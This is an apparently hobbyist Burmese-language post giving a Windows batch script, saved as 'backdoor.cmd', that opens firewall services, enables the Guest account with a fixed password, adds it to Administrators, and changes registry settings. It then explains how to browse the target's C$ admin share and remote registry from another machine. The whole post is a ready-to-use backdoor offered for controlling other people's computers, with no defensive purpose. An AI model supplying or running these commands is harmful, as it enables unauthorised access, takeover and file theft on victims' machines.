ကြန္ျပဴတာ Backdoor Account ဖြင့္ျခင္း

ကိုင္း ေဘာ္ေဘာ္တို႔ သင့္နက္ဝပ္ထဲမွာရွိတဲ့ တစ္ျခားကြန္ျပဴတာတစ္လံုးကို ထိန္းခ်ဳပ္လိုပါသလား။ သူ႔ဖိုင္ေတြအကုန္လံုးကို စိတ္ႀကိဳက္ဝင္ၾကည့္လိုပါသလား။ ဒီေအာက္က ကြန္မန္းေတြကို ႏုတ္ပတ္ထဲမွာ ကူးထည့္လိုက္၊

Save as backdoor.cmd and run it

netsh firewall set service FileAndPrint enable
netsh firewall add portopening protocol=tcp port=135 name=DCOM_TCP135
netsh firewall set service RemoteAdmin enable
NET USER Guest mypassword /active:yes
NET LOCALGROUP Administrators Guest /ADD
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /f /v forceguest /t REG_DWORD /d 0
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /f /v AutoShareWks /t REG_DWORD /d 1
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /f /v AutoShareServer /t REG_DWORD /d 1

 တစ္ေၾကာင္းခ်င္းစီ ျပန္ရွင္းမျပေတာ့ပါဘူးဗ်ာ။ ဒီကြန္မန္းေတြက ကၽြန္ေတာ္ကိုယ္တိုင္ အပင္ပန္းခံရွာေဖြထားတာပါ။ ကိုင္းထားလိုက္ေတာ့ အဲဒီေကာင္ကို ဖြင့္ၿပီးသြားရင္ တစ္ျခားကြန္ျပဴတာကေန ဘယ္လိုဝင္မလဲၾကည့္ရေအာင္။

In Run Box type as follow \\target-pc If user name and password is prompted, you can enter

Username > Guest
Password > mypassword

OK ၿပီေနာ္ အဲဒီလိုဝင္သြားတဲ့အခါမွာ ဘာဖိုဒါမွ မေတြ႔ပဲရွိခ်င္ရင္ ရွိလိမ့္မယ္။ ဒါေပမဲ့ မပူပါနဲ႔ Admin Share ကေနဝင္လို႔ရပါတယ္။ စက္ေတာ္ေတာ္မ်ားမ်ားမွာ အဲဒီေကာင္ ေအာ္တိုပြင့္ေနတတ္ပါတယ္။
Run Box ကေန Drive C ကိုၾကည့္ခ်င္ရင္
\\target-pc\c$
အဲဒီလိုရိုက္၊ က်န္တဲ့ဟာေတြၾကည့္ခ်င္ရင္လည္း အဲဒီလိုရိုက္လို႔ရပါတယ္။ အဲဒီကြန္ျပဴတာရဲ႕ Registry ကိုၾကည့္ခ်င္ရင္ မိမိကြန္ျပဴတာရဲ႕ Registry Editor ကိုဖြင့္ File>Connect Network Registry > ကေန အဲဒီကြန္ျပဴတာကိုရိုက္ၿပီးဝင္ကလိလို႔ရၿပီ။ (Only for Advanced Users) ရွင္းရွင္းေျပာရရင္ အဲဒီကြန္ျပဴတာကို စိတ္ႀကိက္ထိန္းလို႔ရၿပီဗ်ာ။ ေပ်ာ္ရႊင္ပါေစဗ်ာ.......

Share